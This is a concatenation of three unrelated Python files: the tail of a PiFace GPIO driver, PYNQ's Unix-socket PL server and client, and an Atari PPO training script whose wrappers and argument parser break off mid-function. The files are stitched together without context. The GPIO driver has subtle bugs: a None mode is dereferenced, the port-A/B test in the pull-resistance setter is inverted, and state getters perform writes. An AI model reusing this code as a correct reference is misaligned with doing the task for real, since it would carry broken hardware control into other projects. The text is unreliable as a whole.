if self.__pollRunning:
raise InvalidOperationException("Poll thread already running.")
self.__stopEvent.clear()
self.__pollThread = threading.Thread(target=self.__background_poll)
self.__pollThread.name = "PiFaceGpioPoller"
self.__pollThread.daemon = True
self.__pollThread.start()
self.__pollRunning = True
@property
def mode(self):
"""Get the pin mode.
:returns: The pin mode.
:rtype: int
"""
return super(PiFaceGPIO, self).mode
@mode.setter
def mode(self, p_mode):
"""Set the pin mode.
:param int p_mode: The pin mode to set.
:raises: raspy.object_disposed_exception.ObjectDisposedException if
this instance has been disposed.
"""
if self.is_disposed:
raise ObjectDisposedException("PiFaceGpioDigital")
if p_mode is None:
p_mode = p_mode.TRI
PiFaceGPIO.mode.fset(self, p_mode)
# determine A or B port based on pin address
if self.inner_pin.value < self.GPIO_B_OFFSET:
self.__set_mode_a(p_mode)
else:
self.__set_mode_b(p_mode)
# if any pins are configured as input pins, then we need to start the
# interrupt monitoring poll timer.
if self.__currentDirectionA > 0 or self.__currentDirectionB > 0:
self.poll()
else:
self.cancel_poll()
def provision(self):
"""Provision this pin.
:raises: raspy.ObjectDisposedException if this instance has been
disposed.
"""
self.write(PiFaceGPIO.get_initial_pin_value(self))
def __set_pull_resistance_a(self, resistance):
"""Set the pin pull-up/down resistance for port A.
:param raspy.io.pin_pull_resistance.PinPullResistance resistance: The
pin pull resistance flag to set. Can enable the internal pull-up or
pull-down resistor, or disable it.
:raises: raspy.io.io_exception.IOException if unable to write to the
SPI port.
"""
pin_address = self.inner_pin.value - self.GPIO_A_OFFSET
if resistance.value == pin_pull_resistance.PullUp.value:
self.__currentPullupA |= pin_address
else:
self.__currentPullupA &= ~pin_address
self.__write(self.REGISTER_GPPU_A, self.__currentPullupA)
def __set_pull_resistance_b(self, resistance):
"""Set the pin pull-up/down resistance for port B.
:param raspy.io.pin_pull_resistance.PinPullResistance resistance: The
pin pull resistance flag to set. Can enable the internal pull-up or
pull-down resistor, or disable it.
:raises: raspy.io.io_exception.IOException if unable to write to the
SPI port.
"""
pin_address = self.inner_pin.value - self.GPIO_B_OFFSET
if resistance.value == pin_pull_resistance.PullUp.value:
self.__currentPullupB |= pin_address
else:
self.__currentPullupB &= ~pin_address
self.__write(self.REGISTER_GPPU_B, self.__currentPullupB)
@property
def pull_resistance(self):
"""Get the pin pull-up/down resistance.
:returns: The pin pull resistance.
:rtype: raspy.io.pin_pull_resistance.PinPullResistance
"""
return self.__pullResistance
@pull_resistance.setter
def pull_resistance(self, resistance):
"""Set the pin pull-up/down resistance.
:param raspy.io.pin_pull_resistance.PinPullResistance resistance: The
pin pull resistance.
:raises: raspy.object_disposed_exception.ObjectDisposedException if
this instance has been disposed.
:raises: raspy.io.io_exception.IOException if unable to write to the
SPI port.
"""
if self.__pullResistance.value == resistance.value:
return
if self.is_disposed:
raise ObjectDisposedException("PiFaceGpioDigital")
self.__pullResistance = resistance
if self.inner_pin.value > self.GPIO_B_OFFSET:
self.__set_pull_resistance_a(resistance)
else:
self.__set_pull_resistance_b(resistance)
def read(self):
"""Read a value from the pin.
:returns: The state (value) of the pin.
:rtype: int
:raises: raspy.object_disposed_exception.ObjectDisposedException if
this instance has been disposed.
:raises: raspy.io.io_exception.IOException if unable to read from the
SPI port.
"""
if self.is_disposed:
raise ObjectDisposedException("PiFaceGpioDigital")
if self.inner_pin.value < self.GPIO_B_OFFSET:
return self.__read(self.REGISTER_GPIO_A)
return self.__read(self.REGISTER_GPIO_B)
def __get_state_a(self):
"""Get the state of the pin if on Port A.
:returns: The state of the pin.
:rtype: int
:raises: raspy.io.io_exception.IOException if unable to write to the
SPI port.
"""
pin_address = self.inner_pin.value - self.GPIO_A_OFFSET
temp_state = (self.__currentStatesA & pin_address)
my_state = pin_state.LOW
if temp_state == pin_address:
my_state = pin_state.HIGH
super(PiFaceGPIO, self).write(my_state)
return my_state
def __get_state_b(self):
"""Get the state of the pin if on Port B.
:returns: The state of the pin.
:rtype: int
:raises: raspy.io.io_exception.IOException if unable to write to the
SPI port.
"""
pin_address = self.inner_pin.value - self.GPIO_B_OFFSET
temp_state = (self.__currentStatesB & pin_address)
my_state = pin_state.LOW
if temp_state == pin_address:
my_state = pin_state.HIGH
super(PiFaceGPIO, self).write(my_state)
return my_state
@property
def state(self):
"""Get the state of the pin.
:returns: The pin state.
:rtype: int
:raises: raspy.object_disposed_exception.ObjectDisposedException if
this instance has been disposed.
:raises: raspy.io.io_exception.IOException if unable to read from the
SPI port.
"""
if self.is_disposed:
raise ObjectDisposedException("PiFaceGpioDigital")
if self.inner_pin.value < self.GPIO_B_OFFSET:
result = self.__get_state_a()
else:
result = self.__get_state_b()
return result
def dispose(self):
"""Dispose managed resources.
Performs application-defined tasks associated with freeing, releasing,
or resetting resources.
"""
if self.is_disposed:
return
self.cancel_poll()
self.__spi = None
super(PiFaceGPIO, self).dispose()
|
server.py | # Copyright (c) 2016-2021, Xilinx, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION). HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from multiprocessing.connection import Listener
from multiprocessing.connection import Client
from copy import deepcopy
import os
import threading
from pynq.devicetree import DeviceTreeSegment
from pynq.devicetree import get_dtbo_base_name
from .hwh_parser import HWH, get_hwh_name
__author__ = "Yun Rock Qu, Peter Ogden"
__copyright__ = "Copyright 2019, Xilinx"
__email__ = "pynq_support@xilinx.com"
# Overlay constants
PYNQ_PATH = os.path.dirname(os.path.realpath(__file__))
PL_SERVER_TEMPLATE = '/tmp/pynq.{}.socket'
def clear_state(dict_in):
"""Clear the state information for a given dictionary.
Parameters
----------
dict_in : dict
Input dictionary to be cleared.
"""
if type(dict_in) is dict:
for i in dict_in:
if 'state' in dict_in[i]:
dict_in[i]['state'] = None
return dict_in
class DeviceClient:
"""Class to access the PL server
The properties of the class access the most recent version
from the PL server and are read-only. All updating of the
PL server is performed by methods.
"""
@staticmethod
def accessible(tag):
try:
client = DeviceClient(tag)
client.client_request()
client.server_update()
return True
except (ConnectionError, PermissionError):
return False
def __init__(self, tag, key=b'xilinx'):
"""Create a new instance of the PL server
Parameters
----------
tag : string or path
The unique identifier of the device
key : bytes
The authentication key for the server
"""
self._ip_dict = {}
self._gpio_dict = {}
self._interrupt_controllers = {}
self._interrupt_pins = {}
self._hierarchy_dict = {}
self._devicetree_dict = {}
self._address = PL_SERVER_TEMPLATE.format(tag)
self._key = key
self._timestamp = None
self._bitfile_name = None
@property
def ip_dict(self):
"""The getter for the attribute `ip_dict`.
Returns
-------
dict
The dictionary storing addressable IP instances; can be empty.
"""
self.client_request()
self.server_update()
return self._ip_dict
@property
def gpio_dict(self):
"""The getter for the attribute `gpio_dict`.
Returns
-------
dict
The dictionary storing the PS GPIO pins.
"""
self.client_request()
self.server_update()
return self._gpio_dict
@property
def interrupt_pins(self):
"""The getter for the attribute `interrupt_pins`.
Returns
-------
dict
The dictionary storing the interrupt endpoint information.
"""
self.client_request()
self.server_update()
return self._interrupt_pins
@property
def interrupt_controllers(self):
"""The getter for the attribute `interrupt_controllers`.
Returns
-------
dict
The dictionary storing interrupt controller information.
"""
self.client_request()
self.server_update()
return self._interrupt_controllers
@property
def hierarchy_dict(self):
"""The getter for the attribute `hierarchy_dict`
Returns
-------
dict
The dictionary containing the hierarchies in the design
"""
self.client_request()
self.server_update()
return self._hierarchy_dict
@property
def devicetree_dict(self):
"""The getter for the attribute `devicetree_dict`
Returns
-------
dict
The dictionary containing the device tree blobs.
"""
self.client_request()
self.server_update()
return self._devicetree_dict
@property
def bitfile_name(self):
"""The getter for the attribute `bitfile_name`.
Returns
-------
str
The absolute path of the bitstream currently on PL.
"""
self.client_request()
self.server_update()
return self._bitfile_name
@property
def timestamp(self):
"""The getter for the attribute `timestamp`.
Returns
-------
str
Bitstream download timestamp.
"""
self.client_request()
self.server_update()
return self._timestamp
@property
def mem_dict(self):
"""The getter for the attribute `mem_dict`
Returns
-------
dict
The dictionary containing the memory spaces in the design
"""
self.client_request()
self.server_update()
return self._mem_dict
def reset(self, parser=None, timestamp=None, bitfile_name=None):
"""Reset all the dictionaries.
This method must be called after a bitstream download.
1. In case there is a `hwh` file, this method will reset
the states of the IP, GPIO, and interrupt dictionaries .
2. In case there is no `hwh` file, this method will simply
clear the state information stored for all dictionaries.
An existing parser given as the input can significantly reduce
the reset time, since the PL can reset based on the
information provided by the parser.
Parameters
----------
parser : HWH
A parser object to speed up the reset process.
"""
self.client_request()
if parser is not None:
self._ip_dict = parser.ip_dict
self._gpio_dict = parser.gpio_dict
self._interrupt_controllers = parser.interrupt_controllers
self._interrupt_pins = parser.interrupt_pins
self._hierarchy_dict = parser.hierarchy_dict
self._mem_dict = parser.mem_dict
else:
hwh_name = get_hwh_name(self._bitfile_name)
if os.path.isfile(hwh_name):
self._ip_dict = clear_state(self._ip_dict)
self._gpio_dict = clear_state(self._gpio_dict)
else:
self.clear_dict()
if timestamp is not None:
self._timestamp = timestamp
if bitfile_name is not None:
self._bitfile_name = bitfile_name
self.server_update()
def clear_dict(self):
"""Clear all the dictionaries stored in PL.
This method will clear all the related dictionaries, including IP
dictionary, GPIO dictionary, etc.
"""
self._ip_dict.clear()
self._gpio_dict.clear()
self._interrupt_controllers.clear()
self._interrupt_pins.clear()
self._hierarchy_dict.clear()
self._mem_dict.clear()
def load_ip_data(self, ip_name, data):
"""This method writes data to the addressable IP.
Note
----
The data is assumed to be in binary format (.bin). The data
name will be stored as a state information in the IP dictionary.
Parameters
----------
ip_name : str
The name of the addressable IP.
data : str
The absolute path of the data to be loaded.
zero : bool
Zero out the address of the IP not covered by data
Returns
-------
None
"""
self.client_request()
self._ip_dict[ip_name]['state'] = data
self.server_update()
def update_partial_region(self, hier, parser):
"""Merge the parser information from partial region.
Combine the currently PL information and the partial HWH file
parsing results.
Parameters
----------
hier : str
The name of the hierarchical block as the partial region.
parser : HWH
A parser object for the partial region.
"""
self.client_request()
self._update_pr_ip(parser, hier)
self._update_pr_gpio(parser)
self._update_pr_intr_pins(parser)
self._update_pr_hier(hier)
self.server_update()
def _update_pr_ip(self, parser, hier):
merged_ip_dict = deepcopy(self._ip_dict)
if type(parser) is HWH:
for k in merged_ip_dict.copy():
if k.startswith(hier) and 's_axi_control' not in k:
merged_ip_dict.pop(k)
for k, v in parser.ip_dict.items():
parent = k.split('/')[0] + '/' + v['mem_id']
if parent in self._ip_dict:
ip_name = v['fullpath']
merged_ip_dict[ip_name] = dict()
merged_ip_dict[ip_name]['fullpath'] = v['fullpath']
merged_ip_dict[ip_name]['parameters'] = v['parameters']
merged_ip_dict[ip_name]['phys_addr'] = \
self._ip_dict[parent]['phys_addr'] + v['phys_addr']
merged_ip_dict[ip_name]['addr_range'] = v['addr_range']
merged_ip_dict[ip_name]['registers'] = v['registers']
merged_ip_dict[ip_name]['state'] = None
merged_ip_dict[ip_name]['type'] = v['type']
merged_ip_dict[ip_name]['gpio'] = {}
merged_ip_dict[ip_name]['interrupts'] = {}
merged_ip_dict[ip_name]['mem_id'] = v['mem_id']
else:
raise ValueError("Cannot find HWH PR region parser.")
self._ip_dict = merged_ip_dict
def _update_pr_gpio(self, parser):
new_gpio_dict = dict()
for k, v in self._gpio_dict.items():
for pin in v['pins']:
if pin in parser.pins:
v |= parser.nets[parser.pins[pin]]
new_gpio_dict[k] = v
self._gpio_dict = new_gpio_dict
def _update_pr_intr_pins(self, parser):
new_interrupt_pins = dict()
for k, v in self._interrupt_pins.items():
if k in parser.pins:
net_set = parser.nets[parser.pins[k]]
hier_map = {i.count('/'): i for i in net_set}
hier_map = sorted(hier_map.items(), reverse=True)
fullpath = hier_map[0][-1]
new_interrupt_pins[fullpath] = deepcopy(v)
new_interrupt_pins[fullpath]['fullpath'] = fullpath
else:
new_interrupt_pins[k] = v
self._interrupt_pins = new_interrupt_pins
def _update_pr_hier(self, hier):
self._hierarchy_dict[hier] = {
'ip': dict(),
'hierarchies': dict(),
'interrupts': dict(),
'gpio': dict(),
'fullpath': hier,
'memories': dict()
}
for name, val in self._ip_dict.items():
hier, _, ip = name.rpartition('/')
if hier:
self._hierarchy_dict[hier]['ip'][ip] = val
self._hierarchy_dict[hier]['ip'][ip] = val
for name, val in self._hierarchy_dict.items():
hier, _, subhier = name.rpartition('/')
if hier:
self._hierarchy_dict[hier]['hierarchies'][subhier] = val
for interrupt, val in self._interrupt_pins.items():
block, _, pin = interrupt.rpartition('/')
if block in self._ip_dict:
self._ip_dict[block]['interrupts'][pin] = val
if block in self._hierarchy_dict:
self._hierarchy_dict[block]['interrupts'][pin] = val
for gpio in self._gpio_dict.values():
for connection in gpio['pins']:
ip, _, pin = connection.rpartition('/')
if ip in self._ip_dict:
self._ip_dict[ip]['gpio'][pin] = gpio
elif ip in self._hierarchy_dict:
self._hierarchy_dict[ip]['gpio'][pin] = gpio
def clear_devicetree(self):
"""Clear the device tree dictionary.
This should be used when downloading the full bitstream, where all the
dtbo are cleared from the system.
"""
for i in self._devicetree_dict:
self._devicetree_dict[i].remove()
def insert_device_tree(cls, abs_dtbo):
"""Insert device tree segment.
For device tree segments associated with full / partial bitstreams,
users can provide the relative or absolute paths of the dtbo files.
Parameters
----------
abs_dtbo : str
The absolute path to the device tree segment.
"""
cls.client_request()
dtbo_base_name = get_dtbo_base_name(abs_dtbo)
cls._devicetree_dict[dtbo_base_name] = DeviceTreeSegment(abs_dtbo)
cls._devicetree_dict[dtbo_base_name].remove()
cls._devicetree_dict[dtbo_base_name].insert()
cls.server_update()
def remove_device_tree(cls, abs_dtbo):
"""Remove device tree segment for the overlay.
Parameters
----------
abs_dtbo : str
The absolute path to the device tree segment.
"""
cls.client_request()
dtbo_base_name = get_dtbo_base_name(abs_dtbo)
cls._devicetree_dict[dtbo_base_name].remove()
del cls._devicetree_dict[dtbo_base_name]
cls.server_update()
def client_request(self):
"""Client connects to the PL server and receives the attributes.
This method should not be used by the users directly. To check open
pipes in the system, use `lsof | grep <address>` and
`kill -9 <pid>` to manually delete them.
Parameters
----------
address : str
The filename on the file system.
key : bytes
The authentication key of connection.
Returns
-------
None
"""
try:
self._remote = Client(self._address, family='AF_UNIX',
authkey=self._key)
except FileNotFoundError:
raise ConnectionError(
"Could not connect to PL server") from None
self._bitfile_name, self._timestamp, \
self._ip_dict, self._gpio_dict, \
self._interrupt_controllers, \
self._interrupt_pins, \
self._hierarchy_dict, \
self._devicetree_dict, \
self._mem_dict = self._remote.recv()
def server_update(self, continued=1):
self._remote.send([self._bitfile_name,
self._timestamp,
self._ip_dict,
self._gpio_dict,
self._interrupt_controllers,
self._interrupt_pins,
self._hierarchy_dict,
self._devicetree_dict,
self._mem_dict,
continued])
self._remote.close()
pass
class DeviceServer:
"""Class to provide an instance of the PL server
"""
def __init__(self, tag, key=b'xilinx'):
self.tag = tag
self.socket_name = PL_SERVER_TEMPLATE.format(tag)
self.key = key
self.thread = threading.Thread(target=self.server_proc)
self._data = [
"", # Bitfile name
None, # Timestamp
dict(), # IP Dict
dict(), # GPIO Dict
dict(), # Interrupt Dict
dict(), # Interrupt Pin Dict
dict(), # Hierarchy Dict
dict(), # Devicetree dict
dict() # Memory Dict
]
self._started = threading.Event()
def start(self, daemonize=True):
self.thread.daemon = daemonize
self.thread.start()
self._started.wait()
def server_proc(self):
if os.path.exists(self.socket_name):
os.remove(self.socket_name)
server = Listener(self.socket_name, family='AF_UNIX', authkey=self.key)
self._started.set()
status = True
while status:
client = server.accept()
client.send(self._data)
new_data = client.recv()
self._data = new_data[0:-1]
status = new_data[-1]
client.close()
server.close()
if os.path.exists(self.socket_name):
os.remove(self.socket_name)
def stop(self, wait_for_thread=True):
client = DeviceClient(self.tag, self.key)
client.client_request()
client.server_update(0)
if wait_for_thread:
self.thread.join()
def _start_server():
from .device import Device
Device.start_global = True
servers = [
DeviceServer(d.tag) for d in Device.devices
]
for s in servers:
s.start(False)
for s in servers:
s.thread.join()
def _stop_server():
from .device import Device
Device.start_global = True
servers = [
DeviceServer(d.tag) for d in Device.devices
]
for s in servers:
# This is called from a separate process so the threads aren't started
s.stop(False)
|
profiled_async_ppo_atari_visual.py | # https://github.com/facebookresearch/torchbeast/blob/master/torchbeast/core/environment.py
import numpy as np
from collections import deque
import gym
from gym import spaces
import cv2
cv2.ocl.setUseOpenCL(False)
class NoopResetEnv(gym.Wrapper):
def __init__(self, env, noop_max=30):
"""Sample initial states by taking random number of no-ops on reset.
No-op is assumed to be action 0.
"""
gym.Wrapper.__init__(self, env)
self.noop_max = noop_max
self.override_num_noops = None
self.noop_action = 0
assert env.unwrapped.get_action_meanings()[0] == 'NOOP'
def reset(self, **kwargs):
""" Do no-op action for a number of steps in [1, noop_max]."""
self.env.reset(**kwargs)
if self.override_num_noops is not None:
noops = self.override_num_noops
else:
noops = self.unwrapped.np_random.randint(1, self.noop_max + 1) #pylint: disable=E1101
assert noops > 0
obs = None
for _ in range(noops):
obs, _, done, _ = self.env.step(self.noop_action)
if done:
obs = self.env.reset(**kwargs)
return obs
def step(self, ac):
return self.env.step(ac)
class FireResetEnv(gym.Wrapper):
def __init__(self, env):
"""Take action on reset for environments that are fixed until firing."""
gym.Wrapper.__init__(self, env)
assert env.unwrapped.get_action_meanings()[1] == 'FIRE'
assert len(env.unwrapped.get_action_meanings()) >= 3
def reset(self, **kwargs):
self.env.reset(**kwargs)
obs, _, done, _ = self.env.step(1)
if done:
self.env.reset(**kwargs)
obs, _, done, _ = self.env.step(2)
if done:
self.env.reset(**kwargs)
return obs
def step(self, ac):
return self.env.step(ac)
class EpisodicLifeEnv(gym.Wrapper):
def __init__(self, env):
"""Make end-of-life == end-of-episode, but only reset on true game over.
Done by DeepMind for the DQN and co. since it helps value estimation.
"""
gym.Wrapper.__init__(self, env)
self.lives = 0
self.was_real_done = True
def step(self, action):
obs, reward, done, info = self.env.step(action)
self.was_real_done = done
# check current lives, make loss of life terminal,
# then update lives to handle bonus lives
lives = self.env.unwrapped.ale.lives()
if lives < self.lives and lives > 0:
# for Qbert sometimes we stay in lives == 0 condition for a few frames
# so it's important to keep lives > 0, so that we only reset once
# the environment advertises done.
done = True
self.lives = lives
return obs, reward, done, info
def reset(self, **kwargs):
"""Reset only when lives are exhausted.
This way all states are still reachable even though lives are episodic,
and the learner need not know about any of this behind-the-scenes.
"""
if self.was_real_done:
obs = self.env.reset(**kwargs)
else:
# no-op step to advance from terminal/lost life state
obs, _, _, _ = self.env.step(0)
self.lives = self.env.unwrapped.ale.lives()
return obs
class MaxAndSkipEnv(gym.Wrapper):
def __init__(self, env, skip=4):
"""Return only every `skip`-th frame"""
gym.Wrapper.__init__(self, env)
# most recent raw observations (for max pooling across time steps)
self._obs_buffer = np.zeros((2,)+env.observation_space.shape, dtype=np.uint8)
self._skip = skip
def step(self, action):
"""Repeat action, sum reward, and max over last observations."""
total_reward = 0.0
done = None
for i in range(self._skip):
obs, reward, done, info = self.env.step(action)
if i == self._skip - 2: self._obs_buffer[0] = obs
if i == self._skip - 1: self._obs_buffer[1] = obs
total_reward += reward
if done:
break
# Note that the observation on the done=True frame
# doesn't matter
max_frame = self._obs_buffer.max(axis=0)
return max_frame, total_reward, done, info
def reset(self, **kwargs):
return self.env.reset(**kwargs)
class ClipRewardEnv(gym.RewardWrapper):
def __init__(self, env):
gym.RewardWrapper.__init__(self, env)
def reward(self, reward):
"""Bin reward to {+1, 0, -1} by its sign."""
return np.sign(reward)
class WarpFrame(gym.ObservationWrapper):
def __init__(self, env, width=84, height=84, grayscale=True, dict_space_key=None):
"""
Warp frames to 84x84 as done in the Nature paper and later work.
If the environment uses dictionary observations, `dict_space_key` can be specified which indicates which
observation should be warped.
"""
super().__init__(env)
self._width = width
self._height = height
self._grayscale = grayscale
self._key = dict_space_key
if self._grayscale:
num_colors = 1
else:
num_colors = 3
new_space = gym.spaces.Box(
low=0,
high=255,
shape=(self._height, self._width, num_colors),
dtype=np.uint8,
)
if self._key is None:
original_space = self.observation_space
self.observation_space = new_space
else:
original_space = self.observation_space.spaces[self._key]
self.observation_space.spaces[self._key] = new_space
assert original_space.dtype == np.uint8 and len(original_space.shape) == 3
def observation(self, obs):
if self._key is None:
frame = obs
else:
frame = obs[self._key]
if self._grayscale:
frame = cv2.cvtColor(frame, cv2.COLOR_RGB2GRAY)
frame = cv2.resize(
frame, (self._width, self._height), interpolation=cv2.INTER_AREA
)
if self._grayscale:
frame = np.expand_dims(frame, -1)
if self._key is None:
obs = frame
else:
obs = obs.copy()
obs[self._key] = frame
return obs
class FrameStack(gym.Wrapper):
def __init__(self, env, k):
"""Stack k last frames.
Returns lazy array, which is much more memory efficient.
See Also
--------
baselines.common.atari_wrappers.LazyFrames
"""
gym.Wrapper.__init__(self, env)
self.k = k
self.frames = deque([], maxlen=k)
shp = env.observation_space.shape
self.observation_space = spaces.Box(low=0, high=255, shape=(shp[:-1] + (shp[-1] * k,)), dtype=env.observation_space.dtype)
def reset(self):
ob = self.env.reset()
for _ in range(self.k):
self.frames.append(ob)
return self._get_ob()
def step(self, action):
ob, reward, done, info = self.env.step(action)
self.frames.append(ob)
return self._get_ob(), reward, done, info
def _get_ob(self):
assert len(self.frames) == self.k
return LazyFrames(list(self.frames))
class ScaledFloatFrame(gym.ObservationWrapper):
def __init__(self, env):
gym.ObservationWrapper.__init__(self, env)
self.observation_space = gym.spaces.Box(low=0, high=1, shape=env.observation_space.shape, dtype=np.float32)
def observation(self, observation):
# careful! This undoes the memory optimization, use
# with smaller replay buffers only.
return np.array(observation).astype(np.float32) / 255.0
class LazyFrames(object):
def __init__(self, frames):
"""This object ensures that common frames between the observations are only stored once.
It exists purely to optimize memory usage which can be huge for DQN's 1M frames replay
buffers.
This object should only be converted to numpy array before being passed to the model.
You'd not believe how complex the previous solution was."""
self._frames = frames
self._out = None
def _force(self):
if self._out is None:
self._out = np.concatenate(self._frames, axis=-1)
self._frames = None
return self._out
def __array__(self, dtype=None):
out = self._force()
if dtype is not None:
out = out.astype(dtype)
return out
def __len__(self):
return len(self._force())
def __getitem__(self, i):
return self._force()[i]
def count(self):
frames = self._force()
return frames.shape[frames.ndim - 1]
def frame(self, i):
return self._force()[..., i]
def wrap_atari(env, max_episode_steps=None):
assert 'NoFrameskip' in env.spec.id
env = NoopResetEnv(env, noop_max=30)
env = MaxAndSkipEnv(env, skip=4)
assert max_episode_steps is None
return env
def wrap_deepmind(env, episode_life=True, clip_rewards=True, frame_stack=False, scale=False):
"""Configure environment for DeepMind-style Atari.
"""
if episode_life:
env = EpisodicLifeEnv(env)
if 'FIRE' in env.unwrapped.get_action_meanings():
env = FireResetEnv(env)
env = WarpFrame(env)
if scale:
env = ScaledFloatFrame(env)
if clip_rewards:
env = ClipRewardEnv(env)
if frame_stack:
env = FrameStack(env, 4)
return env
class ImageToPyTorch(gym.ObservationWrapper):
"""
Image shape to channels x weight x height
"""
def __init__(self, env):
super(ImageToPyTorch, self).__init__(env)
old_shape = self.observation_space.shape
self.observation_space = gym.spaces.Box(
low=0,
high=255,
shape=(old_shape[-1], old_shape[0], old_shape[1]),
dtype=np.uint8,
)
def observation(self, observation):
return np.transpose(observation, axes=(2, 0, 1))
def wrap_pytorch(env):
return ImageToPyTorch(env)
import torch
import torch.nn as nn
import torch.optim as optim
import torch.nn.functional as F
from torch.distributions.categorical import Categorical
from torch.utils.tensorboard import SummaryWriter
import argparse
from distutils.util import strtobool
import numpy as np
import gym
from gym.wrappers import TimeLimit, Monitor
import pybullet_envs
from gym.spaces import Discrete, Box, MultiBinary, MultiDiscrete, Space
import time
import random
import os
from stable_baselines3.common.vec_env import DummyVecEnv, SubprocVecEnv, VecEnvWrapper
from torch import multiprocessing as mp
from faster_fifo import Queue as FastQueue
from queue import Full, Empty
from multiprocessing.shared_memory import SharedMemory
os.environ["OMP_NUM_THREADS"] = "1" # Necessary for multithreading.
import stopwatch
class SharedNDArray(np.ndarray):
def set_shm(self, shm):
self.shm = shm
def close(self):
self.shm.close()
def unlink(self):
self.shm.unlink()
def share_memory(arr):
shm = SharedMemory(create=True, size=arr.nbytes)
shm_arr = SharedNDArray(arr.shape, dtype=arr.dtype, buffer=shm.buf)
shm_arr[:] = arr[:]
shm_arr.set_shm(shm)
return shm_arr
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='PPO agent')
# Common arguments
parser.add_argument('--exp-name', type=str, default=os.path.basename(__file__).rstrip(".py"),
help='the name of this experiment')
parser.add_argument('--gym-id', type=str, default="BreakoutNoFrameskip-v4",
help='the id of the gym environment')
parser.add_argument('--learning-rate', type=float, default=2.5e-4,
help='the learning rate of the optimizer')
parser.add_argument('--seed', type=int, default=1,
help='seed of the experiment')
parser.add_argument('--total-timesteps', type=int, default=1000000,
help='total timesteps of the experiments')
parser.add_argument('--torch-deterministic', type=lambda x:bool(strtobool(x)), default=True, nargs='?', const=True,
help='if toggled, `torch.backends.cudnn.deterministic=False`')
parser.add_argument('--cuda', type=lambda x:bool(strtobool(x)), default=True, nargs='?', const=True,
help='if toggled, cuda will not be enabled by default')
parser.add_argument('--prod-mode', type=lambda x:bool(strtobool(x)), default=False, nargs='?', const=True,
help='run the script in production mode and use wandb to log outputs')
parser.add_argument('--capture-video', type=lambda x:bool(strtobool(x)), default=False, nargs='?', const=True,
help='weather to capture videos of the agent performances (check out `videos` folder)')
parser.add_argument('--wandb-project-name', type=str, default="cleanRL",
help="the wandb's project name")
parser.add_argument('--wandb-entity', type=str, default=None,
help="the entity (team) of wandb's project")
# Algorithm specific arguments
parser.add_argument('--num-rollout-workers', type=int, default=4,
help='the number of rollout workers')
parser.add_argument('--n-minibatch', type=int, default=4,
help='the number of mini batch')
parser.add_argument('--num-envs', type=int, default=8,
help='the number of parallel game environment')
parser.add_argument('--num-steps', type=int, default=128,
help='the number of steps per game environment')
parser.add_argument('--gamma', type=float, default=0.99,
help='the discount factor gamma')
parser.add_argument('--gae-lambda', type=float, default=0.95,
help='the lambda for the general advantage estimation')
parser.add_argument('--ent-coef', type=float, default=0.01,
help="coefficient of the entropy")
parser.add_argument('--vf-coef', type=float, default=0.5,
help="coefficient of the value function")
parser.add_argument('--max-grad-norm', type=float, default=0.5,
help='the maximum norm for the gradient clipping')
parser.add_argument('--clip-coef', type=float, default=0.1,
help="the surrogate clipping coefficient")
parser.add_argument('--update-epochs', type=int, default=4,
help="the K epochs to update the policy")
parser.add_argument('--kle-stop', type=lambda x:bool(strtobool(x)), default=False, nargs='?', const=True,
help='If toggled, the policy updates will be early stopped w.r.t target-kl')
parser.add_argument('--kle-rollback', type=lambda x:bool(strtobool(x)), default=False, nargs='?', const=True,
help='If toggled, the policy updates will roll back to previous policy if KL exceeds target-kl')
parser.add_argument('--target-kl', type=float, default=0.03,
help='the target-kl variable that is referred by --kl')
parser.add_argument('--gae', type=lambda x:bool(strtobool(x)), default=True, nargs='?', const=True,
help='Use GAE for advantage computation')
parser.add_argument('--norm-adv', type=lambda x:bool(strtobool(x)), default=True, nargs='?', const=True,
help="Toggles advantages normalization")
parser.add_argument('--anneal-lr', type=lambda x:bool(strtobool(x)), default=True, nargs='?', const=True,
help="Toggle learning rate annealing for policy and value networks")
parser.add_argument('--clip-vloss', type=lambda x:bool(strtobool(x)), default=True, nargs='?', const=True,
help='Toggles wheter or not to use a clipped loss for the value function, as per the paper.')
args = parser.parse_args()
if not args.seed:
args.seed = int(time.time())
args.batch_size = int(args.num_envs * args.num_steps)
args.minibatch_size = int(args.batch_size // args.n_minibatch)
# TRY NOT TO MODIFY: setup the environment
experiment_name = f"{args.gym_id}__{args.exp_name}__{args.seed}__{int(time.time())}"
writer = SummaryWriter(f"runs/{experiment_name}")
writer.add_text('hyperparameters', "|param|value|\n|-|-|\n%s" % (
'\n'.join([f"|{key}|{value}|" for key, value in vars(args).items()])))
if args.prod_mode:
import wandb
wandb.init(project=args.wandb_project_name, entity=args.wandb_entity, sync_tensorboard=True, config=vars(args), name=experiment_name, monitor_gym=True, save_code=True)
writer = SummaryWriter(f"/tmp/{experiment_name}")
# TRY NOT TO MODIFY: seeding
device = torch.device('cuda' if torch.cuda.is_available() and args.cuda else 'cpu')
random.seed(args.seed)
np.random.seed(args.seed)
torch.manual_seed(args.seed)
torch.backends.cudnn.deterministic = args.torch_deterministic
def make_env(gym_id, seed, idx):
def thunk():
env = gym.make(gym_id)
env = wrap_atari(env)
env = gym.wrappers.RecordEpisodeStatistics(env)
if args.capture_video:
if idx == 0:
